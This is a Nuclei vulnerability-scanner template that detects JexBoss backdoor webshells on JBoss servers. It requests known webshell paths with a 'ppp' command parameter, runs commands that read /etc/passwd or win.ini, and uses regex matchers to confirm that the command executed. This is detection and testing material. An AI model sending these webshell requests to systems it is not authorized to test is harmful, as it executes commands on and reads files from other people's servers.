nuclei-templates/vulnerabilities/backdoor/jexboss-backdoor.yaml

39 lines
993 B
YAML

id: jexboss-backdoor
info:
name: Jexboss Backdoor Webshell
author: UnkL4b
severity: critical
reference:
- https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
- https://github.com/joaomatosf/jexboss
tags: backdoor,jboss,rce
requests:
- method: GET
path:
- "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('§command§')}}"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('§command§')}}"
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: header
words:
- "X-Powered-By: Servlet"